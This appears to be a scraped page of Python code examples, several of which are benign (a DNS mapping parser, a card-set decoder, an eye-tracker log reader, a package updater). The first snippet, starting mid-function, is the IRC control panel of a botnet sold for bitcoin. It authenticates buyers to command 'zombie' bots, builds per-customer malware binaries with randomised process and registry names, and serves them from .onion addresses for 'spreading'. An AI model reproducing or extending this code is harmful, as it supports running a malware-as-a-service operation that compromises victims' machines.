sendmsg(output, s, "http://f4eqxs3tyrkba7f2.onion/irchelp/help.txt")
elif a.startswith("!commands"):
print "Handling COMMANDS command."
sendmsg(output, s, "http://f4eqxs3tyrkba7f2.onion/irchelp/commands.txt")
sendmsg(output, s, "For the zombie commands, go to http://f4eqxs3tyrkba7f2.onion/commands.txt")
elif a.startswith("!cmd"):
print 'user is running a channel-wide command through Zlo.'
authPassword=""
try:
authPassword = r.split(" ")[4]
except:
pass
command = ""
if not authPassword == "":
for channel in channels:
if not channel == "":
if intelhashing.compare(authPassword, channel.split("|")[2]):
worked=True
print 'user authed for channel-wide command.'
x=0
while 1:
x=x+1
worked=False
if x > 4:
if not command == "":
try:
command = command + " " + r.split(" ")[x]
worked=True
except:
pass
else:
try:
command = command + r.split(" ")[x]
worked=True
except:
pass
if worked == False:
break
command=command.rstrip('\n').rstrip('\r')
if not command == "":
sendmsg(channel.split("|")[0], s, command)
print "command ran."
sendmsg(output, s, "command: " + command + " ran successfully.")
else:
print 'command empty.'
sendmsg(output, s, "You must specify the command you'd like to run.")
command = "x"
else:
sendmsg(output, s, "Remember to enter your password.")
worked=True
command = "x"
print "user: "+output+" forgot to enter his password."
if command == "":
sendmsg(output, s, "Password invalid.")
print "user: "+output+" entered an invalid password for running a bot command."
elif a.startswith("!logout"):
print "user is logging out..."
authPassword=""
try:
authPassword=r.split(" ")[4]
except:
pass
if not authPassword == "":
for channel in channels:
if not channel == "":
print 'trying password: '+authPassword+' against: '+channel.split("|")[2]
if intelhashing.compare(authPassword, channel.split("|")[2]):
print "logging user out..."
sendmsg(channel.split("|")[0], s, "!logout")
print 'user was logged out.'
sendmsg(output, s, "You were logged out.")
else:
sendmsg(output, s, "Remember to input your auth password.")
print "user didn't enter a password to logout: "+output
elif a.startswith("!buy"):
print '!! user is purchasing !!'
sendmsg(output, s, "Creating login...")
print 'creating user login.'
print 'setting channel...'
newchannel = "#"
while 1:
for x in range(0,7):
newchannel = newchannel + random.choice(string.letters+string.digits)
if not newchannel in urllib.urlopen("channels.txt").read():
break
else:
newchannel = "#"
print 'channel set.'
print 'setting channel password...'
channelpassword=generate_password()
print 'password set.'
authpassword=""
print 'creating auth password...'
while 1:
authpassword=generate_password()
goodpassword=True
for channel in channels:
if not channel == "" and "|" in channel:
try:
if channel.split("|")[2] == authpassword:
goodpassword=False
except:
pass
for channel in urllib.urlopen("btcpurchases.txt").read().split():
if not channel == "" and "|" in channel:
try:
if intelhashing.compare(authPassword, channel.split("|")[4]):
goodpassword=False
except:
pass
if goodpassword == True:
break
print 'password set.'
print 'creating the rest of the passwords...'
botmainprocess = generate_password()+".exe"
botdaemonprocess = generate_password()+".exe"
installdir = generate_password()
regkeyname = generate_password()
print 'passwords set.'
currentTime=datetime.datetime.now().strftime("%Y-%m-%d_%H:%M")
bitcoinAddress = conn.getnewaddress()
f = open("btcpurchases.txt", "a")
f.write("\n"+currentTime+"|"+bitcoinAddress+"|"+newchannel+"|"+channelpassword+"|"+intelhashing.encrypt(authpassword)+"|"+botmainprocess+"|"+botdaemonprocess+"|"+installdir+"|"+regkeyname)
f.close()
sendmsg(output, s, "Your account details are [channel: "+newchannel+" channel password "+channelpassword+" auth password: "+authpassword+"]")
sendmsg(output, s, "In order to activate your account, you must send "+channelCost+" BTC or more to the follwing address: "+bitcoinAddress+" - cleaned coins and multi-payment transactions are okay, just make sure to pay in full within 24 hours. Your account will not be activated until the Bitcoin transaction has 3 confirmations. It may take a short time for our system to recognize this, as well. To join a password-protected IRC channel, type /join #channel password")
# channels = urllib.urlopen("channels.txt").read().split()
# s.send("JOIN "+newchannel+"\r\n")
# s.send("MODE "+newchannel+" +k "+channelpassword+"\r\n")
# print 'user created.'
# for x in range(0,3):
# sendmsg(output, s, "User created. WRITE DOWN THE FOLLOWING!: auth password: "+authpassword+" channel password: "+channelpassword+" channel: "+newchannel)
elif a.startswith("!newbin"):
print "creating new binary..." #give user file md5 sum
sendmsg(output, s, "Creating new binary...")
authPassword=""
try:
authPassword=r.split(" ")[4]
except:
pass
botmainprocess=""
botdaemonprocess=""
newchannel=""
channelpassword=""
regkeyname=""
installdir=""
laworked=False
if not authPassword == "":
for channel in channels:
if not channel == "" and "|" in channel:
print "trying "+authPassword+" against "+channel.split("|")[2]
if intelhashing.compare(authPassword, channel.split("|")[2]):
if not NumberProcsOpen("pyinstaller.exe") > 5 and not NumberProcsOpen("python.exe") > 7:
newchannel=channel.split("|")[0]
channelpassword=channel.split("|")[1]
botmainprocess=channel.split("|")[3]
botdaemonprocess=channel.split("|")[4]
installdir=channel.split("|")[5]
regkeyname=channel.split("|")[6]
outputfile=""
while 1:
outputfile=""
for x in range(0,random.randrange(5,12)):
outputfile = outputfile + random.choice(string.letters+string.digits)
print "output file will be: "+outputfile+".exe..."
outputfile = outputfile + ".exe"
if not os.path.isfile("\\Python27\\Scripts\\dist\\"+outputfile):
print "running build command..."
os.chdir("\\python27\\scripts")
print "command: chp.exe \\python27\\python.exe compileZIB.py "+botmainprocess+" "+botdaemonprocess+" "+newchannel+" "+channelpassword+" "+regkeyname+" "+installdir+" "+outputfile
os.system("chp.exe \\python27\\python.exe compileZIB.py "+botmainprocess+" "+botdaemonprocess+" "+newchannel+" "+channelpassword+" "+regkeyname+" "+installdir+" "+outputfile)
print "build command ran."
sendmsg(output,s,"Your file should be avaliable at: http://zpsbcbp3hz7syjmt.onion:80/"+outputfile+" within a minute, or two. After 3 minutes, it will be deleted.")
sendmsg(output, s, "NOTICE: Make sure to test new binaries before spreading them, or updating them on your bots. Always use MD5 verification before using bots' update function. If you get a dead binary, re-build. If that doesn't work, get in contact with us ASAP.")
laworked=True
print 'binary: '+outputfile+' created for user: '+output
break
else:
print "Error: Maximum number of binary builds running (5). user tried to create a new one: "+output
sendmsg(output, s, "The maximum number of concurrent binary builds has reached its peak. Please try again later. If you're found abusing this function, your license will be permanently terminated without notice. Please try again in ten minutes.")
if laworked == True:
break
else:
print 'user entered no password.'
sendmsg(output, s, "No password specified. Unable to build binary.")
laworked=True
if laworked == False:
sendmsg(output, s, "Invalid main authentication password entered. Unable to build binary.")
print "user: "+output+" entered the wrong password."
elif a.startswith("!recoverpassword"):
authPassword = ""
try:
authPassword=r.split(" ")[4]
print "authentication password recovery input: "+authPassword+" by user: "+output
except:
pass
authSuccess=False
if not authPassword == "":
for channel in channels:
if not channel == "" and "|" in channel:
if intelhashing.compare(authPassword, channel.split("|")[2]):
authSuccess=True
print "Password recovery authentication successful! Password: " + authPassword + " recovered password: "+channel.split("|")[1]+" channel: "+channel.split("|")[0]
sendmsg(output, s, "Password recovery successful! Recovered channel password: "+channel.split("|")[1]+" channel: "+channel.split("|")[0])
else:
sendmsg(output, s, "You failed to input your main authentication password.")
print "Authentication password recovery auth failed due to no password."
authSuccess=True
if authSuccess == False:
sendmsg(output, s, "Channel password recovery failed! Invalid password.")
print "Password recovery auth failed. password: " + authPassword
elif a.startswith("!auth"):
authPassword = ""
print "Handling AUTH command."
worked=False
try:
authPassword = r.split(" ")[4]
print "Authentication password: "+authPassword
worked = True
except:
pass
authworked=False
if worked == True:
for channel in channels:
if not channel == "" and "|" in channel:
print "testing password: "+channel.split("|")[2]+" against: "+authPassword+"."
if intelhashing.compare(authPassword, channel.split("|")[2]):
sendmsg(channel.split("|")[0], s, "!login "+output)
authworked=True
sendmsg(output, s, "You have been successfully authenticated. Join the channel "+channel.split("|")[0]+", in order to control your bots. Make sure to run the !logout command in your channel as an authenticated user to logout all pre-existing log-ins, so nobody can change their nick-name to yours and control your bots. This is unlikely to happen, unless a user has stolen your channel password. To join a passworded IRC channel, type /join #channel password")
print "Authentication successful!"
if authworked == False:
sendmsg(output, s, "Authentication failed. Commands are case-sensitive.")
print "Authentication failed."
0
Example 74
Project: dnsviz Source File: probe.py
def name_addr_mappings_from_string(domain, addr_mappings, delegation_mapping, require_name):
global next_port
addr_mappings = addr_mappings.split(',')
i = 1
for mapping in addr_mappings:
# get rid of whitespace
mapping = mapping.strip()
# Determine whether there is a port stuck on there
match = PORT_RE.search(mapping)
if match is not None:
mapping = match.group(1)
port = int(match.group(2))
port_str = ':%d' % port
else:
port = 53
port_str = ''
num_replacements = None
# if the value is actually a path, then check it as a zone file
if os.path.isfile(mapping):
# if this is a file containing delegation records, then read the
# file, create a name=value string, and call name_addr_mappings_from_string()
if require_name:
mappings_from_file = []
try:
s = io.open(mapping, 'r', encoding='utf-8').read()
except IOError as e:
usage('%s: "%s"' % (e.strerror, mapping))
sys.exit(3)
try:
m = dns.message.from_text(str(';ANSWER\n'+s))
except dns.exception.DNSException as e:
usage('Error reading delegation records from %s: "%s"' % (mapping, e))
sys.exit(3)
try:
ns_rrset = m.find_rrset(m.answer, domain, dns.rdataclass.IN, dns.rdatatype.NS)
except KeyError:
usage('No NS records for %s found in %s' % (lb2s(domain.canonicalize().to_text()), mapping))
sys.exit(3)
for rdata in ns_rrset:
a_rrsets = [r for r in m.answer if r.name == rdata.target and r.rdtype in (dns.rdatatype.A, dns.rdatatype.AAAA)]
if not a_rrsets or not rdata.target.is_subdomain(domain.parent()):
mappings_from_file.append(lb2s(rdata.target.canonicalize().to_text()))
else:
for a_rrset in a_rrsets:
for a_rdata in a_rrset:
mappings_from_file.append('%s=%s' % (lb2s(rdata.target.canonicalize().to_text()), IPAddr(a_rdata.address)))
name_addr_mappings_from_string(domain, ','.join(mappings_from_file), delegation_mapping, require_name)
continue
# otherwise (it is the zone proper), just serve the file
else:
if port_str == '':
#TODO assign random port here
port = next_port
next_port += 1
_serve_zone(domain, mapping, port)
name = 'localhost'
addr = '127.0.0.1'
else:
# First determine whether the argument is name=value or simply value
try:
name, addr = NAME_VAL_DELIM_RE.split(mapping, 1)
except ValueError:
# Argument is a single value. Now determine whether that value is
# a name or an address.
try:
IPAddr(BRACKETS_RE.sub(r'\1', mapping))
except ValueError:
# see if this was an IPv6 address without a port
try:
IPAddr(mapping + port_str)
except ValueError:
pass
else:
usage('Brackets are required around IPv6 addresses.')
sys.exit(1)
# value is not an address
name = mapping
addr = None
else:
if require_name:
usage('A name is required to accompany the address for this option.')
sys.exit(1)
# value is an address
name = 'ns%d' % i
addr, num_replacements = BRACKETS_RE.subn(r'\1', mapping)
i += 1
else:
# Argument is name=value
addr, num_replacements = BRACKETS_RE.subn(r'\1', addr)
if not name:
usage('The domain name was empty.')
sys.exit(1)
# At this point, name is defined, and addr may or may not be defined.
# Both are of type str.
# Check that the name is valid
try:
name = dns.name.from_text(name)
except dns.exception.DNSException:
usage('The domain name was invalid: "%s"' % name)
sys.exit(1)
# Add the name to the NS RRset
delegation_mapping[(domain, dns.rdatatype.NS)].add(dns.rdtypes.ANY.NS.NS(dns.rdataclass.IN, dns.rdatatype.NS, name))
if addr is None:
if not require_name:
# If no address is provided, query A/AAAA records for the name
query_tuples = ((name, dns.rdatatype.A, dns.rdataclass.IN), (name, dns.rdatatype.AAAA, dns.rdataclass.IN))
answer_map = bootstrap_resolver.query_multiple_for_answer(*query_tuples)
found_answer = False
for (n, rdtype, rdclass) in answer_map:
a = answer_map[(n, rdtype, rdclass)]
if isinstance(a, DNSAnswer):
found_answer = True
delegation_mapping[(name, rdtype)] = dns.rrset.from_text_list(name, 0, dns.rdataclass.IN, rdtype, [IPAddr(r.address) for r in a.rrset])
if port != 53:
for r in a.rrset:
odd_ports[(domain, IPAddr(r.address))] = port
# negative responses
elif isinstance(a, (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer)):
pass
# error responses
elif isinstance(a, (dns.exception.Timeout, dns.resolver.NoNameservers)):
usage('There was an error resolving "%s". Please specify an address or use a name that resolves properly.' % fmt.humanize_name(name))
sys.exit(1)
if not found_answer:
usage('"%s" did not resolve to an address. Please specify an address or use a name that resolves properly.' % fmt.humanize_name(name))
sys.exit(1)
elif not addr:
if not require_name:
usage('The IP address was empty.')
sys.exit(1)
else:
try:
IPAddr(addr)
except ValueError:
# see if this was an IPv6 address without a port
try:
IPAddr(addr + port_str)
except ValueError:
usage('The IP address was invalid: "%s"' % addr)
sys.exit(1)
else:
usage('Brackets are required around IPv6 addresses.')
sys.exit(1)
if IPAddr(addr).version == 6:
if num_replacements < 1:
usage('Brackets are required around IPv6 addresses.')
sys.exit(1)
a_rdtype = dns.rdatatype.AAAA
rdtype_cls = dns.rdtypes.IN.AAAA.AAAA
else:
a_rdtype = dns.rdatatype.A
rdtype_cls = dns.rdtypes.IN.A.A
if (name, a_rdtype) not in delegation_mapping:
delegation_mapping[(name, a_rdtype)] = dns.rrset.RRset(name, dns.rdataclass.IN, a_rdtype)
delegation_mapping[(name, a_rdtype)].add(rdtype_cls(dns.rdataclass.IN, a_rdtype, addr))
if port != 53:
odd_ports[(domain, IPAddr(addr))] = port
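The mapping strings parsed above follow a small grammar: an optional name, an optional bracketed IPv6 address, an optional port, or a path to a delegation/zone file (detected with os.path.isfile). A few illustrative values, with placeholder hostnames, addresses, and paths:
examples = [
    'ns1.example.com=192.0.2.1',            # name=value
    'ns2.example.com=[2001:db8::53]:5300',  # bracketed IPv6 with an explicit port
    '198.51.100.4',                         # bare address; a generic name (ns1, ns2, ...) is assigned
    'ns3.example.com',                      # bare name; A/AAAA records are resolved for it
    '/tmp/example.com.zone',                # a file path, served as the zone or read for NS records
]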
0
Example 75
Project: mtgencode Source File: decode.py
def main(fname, oname = None, verbose = True, encoding = 'std',
gatherer = False, for_forum = False, for_mse = False,
creativity = False, vdump = False, for_html = False):
# there is a sane thing to do here (namely, produce both at the same time)
# but we don't support it yet.
if for_mse and for_html:
print 'ERROR - decode.py - incompatible formats "mse" and "html"'
return
fmt_ordered = cardlib.fmt_ordered_default
if encoding in ['std']:
pass
elif encoding in ['named']:
fmt_ordered = cardlib.fmt_ordered_named
elif encoding in ['noname']:
fmt_ordered = cardlib.fmt_ordered_noname
elif encoding in ['rfields']:
pass
elif encoding in ['old']:
fmt_ordered = cardlib.fmt_ordered_old
elif encoding in ['norarity']:
fmt_ordered = cardlib.fmt_ordered_norarity
elif encoding in ['vec']:
pass
elif encoding in ['custom']:
## put custom format decisions here ##########################
## end of custom format ######################################
pass
else:
raise ValueError('decode.py: unknown encoding: ' + encoding)
cards = jdecode.mtg_open_file(fname, verbose=verbose, fmt_ordered=fmt_ordered)
if creativity:
namediff = Namediff()
cbow = CBOW()
if verbose:
print 'Computing nearest names...'
nearest_names = namediff.nearest_par(map(lambda c: c.name, cards), n=3)
if verbose:
print 'Computing nearest cards...'
nearest_cards = cbow.nearest_par(cards)
for i in range(0, len(cards)):
cards[i].nearest_names = nearest_names[i]
cards[i].nearest_cards = nearest_cards[i]
if verbose:
print '...Done.'
def hoverimg(cardname, dist, nd):
truename = nd.names[cardname]
code = nd.codes[cardname]
namestr = ''
if for_html:
if code:
namestr = ('<div class="hover_img"><a href="#">' + truename
+ '<span><img style="background: url(http://magiccards.info/scans/en/' + code
+ ');" alt=""/></span></a>' + ': ' + str(dist) + '\n</div>\n')
else:
namestr = '<div>' + truename + ': ' + str(dist) + '</div>'
elif for_forum:
namestr = '[card]' + truename + '[/card]' + ': ' + str(dist) + '\n'
else:
namestr = truename + ': ' + str(dist) + '\n'
return namestr
def writecards(writer):
if for_mse:
# have to prepend a massive chunk of formatting info
writer.write(utils.mse_prepend)
if for_html:
# have to prepend html info
writer.write(utils.html_prepend)
# separate the write function to allow for writing smaller chunks of cards at a time
segments = sort_colors(cards)
for i in range(len(segments)):
# sort color by CMC
segments[i] = sort_type(segments[i])
# this allows card boxes to be colored for each color
# for coloring of each box separately, cardlib.Card.format() must change non-minimally
writer.write('<div id="' + utils.segment_ids[i] + '">')
writehtml(writer, segments[i])
writer.write("</div><hr>")
# closing the html file
writer.write(utils.html_append)
return # break out of the writecards function to avoid writing cards twice
for card in cards:
if for_mse:
writer.write(card.to_mse().encode('utf-8'))
fstring = ''
if card.json:
fstring += 'JSON:\n' + card.json + '\n'
if card.raw:
fstring += 'raw:\n' + card.raw + '\n'
fstring += '\n'
fstring += card.format(gatherer = gatherer, for_forum = for_forum,
vdump = vdump) + '\n'
fstring = fstring.replace('<', '(').replace('>', ')')
writer.write(('\n' + fstring[:-1]).replace('\n', '\n\t\t'))
else:
fstring = card.format(gatherer = gatherer, for_forum = for_forum,
vdump = vdump, for_html = for_html)
writer.write((fstring + '\n').encode('utf-8'))
if creativity:
cstring = '~~ closest cards ~~\n'
nearest = card.nearest_cards
for dist, cardname in nearest:
cstring += hoverimg(cardname, dist, namediff)
cstring += '~~ closest names ~~\n'
nearest = card.nearest_names
for dist, cardname in nearest:
cstring += hoverimg(cardname, dist, namediff)
if for_mse:
cstring = ('\n\n' + cstring[:-1]).replace('\n', '\n\t\t')
writer.write(cstring.encode('utf-8'))
writer.write('\n'.encode('utf-8'))
if for_mse:
# more formatting info
writer.write('version control:\n\ttype: none\napprentice code: ')
def writehtml(writer, card_set):
for card in card_set:
fstring = card.format(gatherer = gatherer, for_forum = True,
vdump = vdump, for_html = for_html)
if creativity:
fstring = fstring[:-6] # chop off the closing </div> to stick stuff in
writer.write((fstring + '\n').encode('utf-8'))
if creativity:
cstring = '~~ closest cards ~~\n<br>\n'
nearest = card.nearest_cards
for dist, cardname in nearest:
cstring += hoverimg(cardname, dist, namediff)
cstring += "<br>\n"
cstring += '~~ closest names ~~\n<br>\n'
nearest = card.nearest_names
for dist, cardname in nearest:
cstring += hoverimg(cardname, dist, namediff)
cstring = '<hr><div>' + cstring + '</div>\n</div>'
writer.write(cstring.encode('utf-8'))
writer.write('\n'.encode('utf-8'))
# Sorting by colors
def sort_colors(card_set):
# Initialize sections
red_cards = []
blue_cards = []
green_cards = []
black_cards = []
white_cards = []
multi_cards = []
colorless_cards = []
lands = []
for card in card_set:
if len(card.get_colors())>1:
multi_cards += [card]
continue
if 'R' in card.get_colors():
red_cards += [card]
continue
elif 'U' in card.get_colors():
blue_cards += [card]
continue
elif 'B' in card.get_colors():
black_cards += [card]
continue
elif 'G' in card.get_colors():
green_cards += [card]
continue
elif 'W' in card.get_colors():
white_cards += [card]
continue
else:
if "land" in card.get_types():
lands += [card]
continue
colorless_cards += [card]
return[white_cards, blue_cards, black_cards, red_cards, green_cards, multi_cards, colorless_cards, lands]
def sort_type(card_set):
sorting = ["creature", "enchantment", "instant", "sorcery", "artifact", "planeswalker"]
sorted_cards = [[],[],[],[],[],[],[]]
sorted_set = []
for card in card_set:
types = card.get_types()
for i in range(len(sorting)):
if sorting[i] in types:
sorted_cards[i] += [card]
break
else:
sorted_cards[6] += [card]
for value in sorted_cards:
for card in value:
sorted_set += [card]
return sorted_set
def sort_cmc(card_set):
sorted_cards = []
sorted_set = []
for card in card_set:
# make sure there is an empty set for each CMC
while len(sorted_cards)-1 < card.get_cmc():
sorted_cards += [[]]
# add card to correct set of CMC values
sorted_cards[card.get_cmc()] += [card]
# combine each set of CMC valued cards together
for value in sorted_cards:
for card in value:
sorted_set += [card]
return sorted_set
if oname:
if for_html:
print oname
# if ('.html' != oname[-])
# oname += '.html'
if verbose:
print 'Writing output to: ' + oname
with open(oname, 'w') as ofile:
writecards(ofile)
if for_mse:
# Copy whatever output file is produced, name the copy 'set' (yes, no extension).
if os.path.isfile('set'):
print 'ERROR: tried to overwrite existing file "set" - aborting.'
return
shutil.copyfile(oname, 'set')
# Use the freaky mse extension instead of zip.
with zipfile.ZipFile(oname+'.mse-set', mode='w') as zf:
try:
# Zip up the set file into oname.mse-set.
zf.write('set')
finally:
if verbose:
print 'Made an MSE set file called ' + oname + '.mse-set.'
# The set file is useless outside the .mse-set, delete it.
os.remove('set')
else:
writecards(sys.stdout)
sys.stdout.flush()
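A minimal invocation sketch for the decoder's entry point above; the input and output paths are placeholders:
# Decode an encoded card corpus to an HTML page of cards.
main('output/cards.txt', oname='cards.html', for_html=True, verbose=True)

# Or write a Magic Set Editor set file (oname + '.mse-set') instead.
main('output/cards.txt', oname='mycards', for_mse=True)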
0
Example 76
Project: PyGazeAnalyser Source File: eyetribereader.py
def read_eyetribe(filename, start, stop=None, missing=0.0, debug=False):
"""Returns a list with dicts for every trial. A trial dict contains the
following keys:
x - numpy array of x positions
y - numpy array of y positions
size - numpy array of pupil size
time - numpy array of timestamps, t=0 at trialstart
trackertime- numpy array of timestamps, according to the tracker
events - dict with the following keys:
Sfix - list of lists, each containing [starttime]
Ssac - EMPTY! list of lists, each containing [starttime]
Sblk - list of lists, each containing [starttime]
Efix - list of lists, each containing [starttime, endtime, duration, endx, endy]
Esac - EMPTY! list of lists, each containing [starttime, endtime, duration, startx, starty, endx, endy]
Eblk - list of lists, each containing [starttime, endtime, duration]
msg - list of lists, each containing [time, message]
NOTE: timing is in EyeTribe time!
arguments
filename - path to the file that has to be read
start - trial start string
keyword arguments
stop - trial ending string (default = None)
missing - value to be used for missing data (default = 0.0)
debug - Boolean indicating if DEBUG mode should be on or off;
if DEBUG mode is on, information on what the script
currently is doing will be printed to the console
(default = False)
returns
data - a list with a dict for every trial (see above)
"""
# # # # #
# debug mode
if debug:
def message(msg):
print(msg)
else:
def message(msg):
pass
# # # # #
# file handling
# check if the file exists
if os.path.isfile(filename):
# open file
message("opening file '%s'" % filename)
f = open(filename, 'r')
# raise exception if the file does not exist
else:
raise Exception("Error in read_eyetribe: file '%s' does not exist" % filename)
# read file contents
message("reading file '%s'" % filename)
raw = f.readlines()
# close file
message("closing file '%s'" % filename)
f.close()
# # # # #
# parse lines
# variables
data = []
x = []
y = []
size = []
time = []
trackertime = []
events = {'Sfix':[],'Ssac':[],'Sblk':[],'Efix':[],'Esac':[],'Eblk':[],'msg':[]}
starttime = 0
started = False
trialend = False
# loop through all lines
for i in range(len(raw)):
# string to list
line = raw[i].replace('\n','').replace('\r','').split('\t')
# check if trial has already started
if started:
# only check for stop if there is one
if stop is not None:
if (line[0] == 'MSG' and stop in line[3]) or i == len(raw)-1:
started = False
trialend = True
# check for new start otherwise
else:
if start in line or i == len(raw)-1:
started = True
trialend = True
# # # # #
# trial ending
if trialend:
message("trialend %d; %d samples found" % (len(data),len(x)))
# trial dict
trial = {}
trial['x'] = numpy.array(x)
trial['y'] = numpy.array(y)
trial['size'] = numpy.array(size)
trial['time'] = numpy.array(time)
trial['trackertime'] = numpy.array(trackertime)
trial['events'] = copy.deepcopy(events)
# events
trial['events']['Sblk'], trial['events']['Eblk'] = blink_detection(trial['x'],trial['y'],trial['trackertime'],missing=missing)
trial['events']['Sfix'], trial['events']['Efix'] = fixation_detection(trial['x'],trial['y'],trial['trackertime'],missing=missing)
trial['events']['Ssac'], trial['events']['Esac'] = saccade_detection(trial['x'],trial['y'],trial['trackertime'],missing=missing)
# add trial to data
data.append(trial)
# reset stuff
x = []
y = []
size = []
time = []
trackertime = []
events = {'Sfix':[],'Ssac':[],'Sblk':[],'Efix':[],'Esac':[],'Eblk':[],'msg':[]}
trialend = False
# check if the current line contains start message
else:
if line[0] == "MSG":
if start in line[3]:
message("trialstart %d" % len(data))
# set started to True
started = True
# find starting time
starttime = int(line[2])
# # # # #
# parse line
if started:
# message lines will start with MSG, followed by a tab, then a
# timestamp, a tab, the time, a tab and the message, e.g.:
# "MSG\t2014-07-01 17:02:33.770\t853589802\tsomething of importance here"
if line[0] == "MSG":
t = int(line[2]) # time
m = line[3] # message
events['msg'].append([t,m])
# regular lines will contain tab separated values, beginning with
# a timestamp, followed by the values that were asked to be stored
# in the data file. Usually, this comes down to
# timestamp, time, fix, state, rawx, rawy, avgx, avgy, psize,
# Lrawx, Lrawy, Lavgx, Lavgy, Lpsize, Lpupilx, Lpupily,
# Rrawx, Rrawy, Ravgx, Ravgy, Rpsize, Rpupilx, Rpupily
# e.g.:
# '2014-07-01 17:02:33.770, 853589802, False, 7, 512.5897, 510.8104, 614.6975, 614.3327, 16.8657,
# 523.3592, 475.2756, 511.1529, 492.7412, 16.9398, 0.4037, 0.5209,
# 501.8202, 546.3453, 609.3405, 623.2287, 16.7916, 0.5539, 0.5209'
else:
# see if current line contains relevant data
try:
# extract data
x.append(float(line[6]))
y.append(float(line[7]))
size.append(float(line[8]))
time.append(int(line[1])-starttime)
trackertime.append(int(line[1]))
except:
message("line '%s' could not be parsed" % line)
continue # skip this line
# # # # #
# return
return data
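A brief usage sketch based on the docstring above; the log filename and the trial start/stop markers are placeholders:
data = read_eyetribe('participant01.tsv', start='TRIALSTART', stop='TRIALEND', missing=0.0)
first_trial = data[0]
print(first_trial['x'].mean(), first_trial['y'].mean())       # gaze position arrays
print(len(first_trial['events']['Efix']), 'fixations found')  # detected fixation events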
0
Example 77
@expose(hide=True)
def default(self):
# All package update
if ((not self.app.pargs.php56)):
apt_packages = []
packages = []
if ((not self.app.pargs.web) and (not self.app.pargs.nginx) and
(not self.app.pargs.php) and (not self.app.pargs.mysql) and
(not self.app.pargs.postfix) and (not self.app.pargs.hhvm) and
(not self.app.pargs.mailscanner) and (not self.app.pargs.all)
and (not self.app.pargs.wpcli) and (not self.app.pargs.redis) and (not self.app.pargs.nginxmainline)):
self.app.pargs.web = True
if self.app.pargs.all:
self.app.pargs.web = True
self.app.pargs.mail = True
if self.app.pargs.web:
if EEAptGet.is_installed(self, 'nginx-custom'):
self.app.pargs.nginx = True
else:
Log.info(self, "Nginx is not already installed")
self.app.pargs.php = True
self.app.pargs.mysql = True
self.app.pargs.postfix = True
self.app.pargs.wpcli = True
if self.app.pargs.mail:
self.app.pargs.nginx = True
self.app.pargs.php = True
self.app.pargs.mysql = True
self.app.pargs.wpcli = True
self.app.pargs.postfix = True
if EEAptGet.is_installed(self, 'dovecot-core'):
apt_packages = apt_packages + EEVariables.ee_mail
self.app.pargs.mailscanner = True
else:
Log.info(self, "Mail server is not installed")
if self.app.pargs.nginx :
if EEAptGet.is_installed(self, 'nginx-custom'):
apt_packages = apt_packages + EEVariables.ee_nginx
else:
Log.info(self, "Nginx Stable is not already installed")
if self.app.pargs.php:
if (EEVariables.ee_platform_distro == 'debian' or EEVariables.ee_platform_codename == 'precise'):
if EEAptGet.is_installed(self, 'php5-fpm'):
apt_packages = apt_packages + EEVariables.ee_php
else:
Log.info(self, "PHP is not installed")
if EEAptGet.is_installed(self, 'php7.0-fpm'):
apt_packages = apt_packages + EEVariables.ee_php7_0
else:
if EEAptGet.is_installed(self, 'php5.6-fpm'):
apt_packages = apt_packages + EEVariables.ee_php5_6 + EEVariables.ee_php_extra
else:
Log.info(self, "PHP 5.6 is not installed")
if EEAptGet.is_installed(self, 'php7.0-fpm'):
apt_packages = apt_packages + EEVariables.ee_php7_0 + EEVariables.ee_php_extra
else:
Log.info(self, "PHP 7.0 is not installed")
if self.app.pargs.hhvm:
if EEAptGet.is_installed(self, 'hhvm'):
apt_packages = apt_packages + EEVariables.ee_hhvm
else:
Log.info(self, "HHVM is not installed")
if self.app.pargs.mysql:
if EEAptGet.is_installed(self, 'mariadb-server'):
apt_packages = apt_packages + EEVariables.ee_mysql
else:
Log.info(self, "MariaDB is not installed")
if self.app.pargs.postfix:
if EEAptGet.is_installed(self, 'postfix'):
apt_packages = apt_packages + EEVariables.ee_postfix
else:
Log.info(self, "Postfix is not installed")
if self.app.pargs.redis:
if EEAptGet.is_installed(self, 'redis-server'):
apt_packages = apt_packages + EEVariables.ee_redis
else:
Log.info(self, "Redis is not installed")
if self.app.pargs.wpcli:
if os.path.isfile('/usr/bin/wp'):
packages = packages + [["https://github.com/wp-cli/wp-cli/"
"releases/download/v{0}/"
"wp-cli-{0}.phar"
"".format(EEVariables.ee_wp_cli),
"/usr/bin/wp",
"WP-CLI"]]
else:
Log.info(self, "WPCLI is not installed with EasyEngine")
if self.app.pargs.mailscanner:
if EEAptGet.is_installed(self, 'amavisd-new'):
apt_packages = (apt_packages + EEVariables.ee_mailscanner)
else:
Log.info(self, "MailScanner is not installed")
if len(packages) or len(apt_packages):
Log.info(self, "During the package update process, non-nginx-cached"
" parts of your site may remain down")
# Check prompt
if (not self.app.pargs.no_prompt):
start_upgrade = input("Do you want to continue:[y/N]")
if start_upgrade != "Y" and start_upgrade != "y":
Log.error(self, "Not starting package update")
Log.info(self, "Updating packages, please wait...")
if len(apt_packages):
# apt-get update
EEAptGet.update(self)
# Update packages
EEAptGet.install(self, apt_packages)
# Post Actions after package updates
if (set(EEVariables.ee_nginx).issubset(set(apt_packages))):
EEService.restart_service(self, 'nginx')
if (EEVariables.ee_platform_distro == 'debian' or EEVariables.ee_platform_codename == 'precise'):
if set(EEVariables.ee_php).issubset(set(apt_packages)):
EEService.restart_service(self, 'php5-fpm')
else:
if set(EEVariables.ee_php5_6).issubset(set(apt_packages)):
EEService.restart_service(self, 'php5.6-fpm')
if set(EEVariables.ee_php7_0).issubset(set(apt_packages)):
EEService.restart_service(self, 'php7.0-fpm')
if set(EEVariables.ee_hhvm).issubset(set(apt_packages)):
EEService.restart_service(self, 'hhvm')
if set(EEVariables.ee_postfix).issubset(set(apt_packages)):
EEService.restart_service(self, 'postfix')
if set(EEVariables.ee_mysql).issubset(set(apt_packages)):
EEService.restart_service(self, 'mysql')
if set(EEVariables.ee_mail).issubset(set(apt_packages)):
EEService.restart_service(self, 'dovecot')
if set(EEVariables.ee_redis).issubset(set(apt_packages)):
EEService.restart_service(self, 'redis-server')
if len(packages):
if self.app.pargs.wpcli:
EEFileUtils.remove(self,['/usr/bin/wp'])
Log.debug(self, "Downloading following: {0}".format(packages))
EEDownload.download(self, packages)
if self.app.pargs.wpcli:
EEFileUtils.chmod(self, "/usr/bin/wp", 0o775)
Log.info(self, "Successfully updated packages")
# PHP 5.6 to 5.6
elif (self.app.pargs.php56):
self.upgrade_php56()
else:
self.app.args.print_help()
0
Example 78
Project: qiime Source File: assign_taxonomy.py
def main():
option_parser, opts, args = parse_command_line_parameters(**script_info)
assignment_method = opts.assignment_method
similarity = opts.similarity
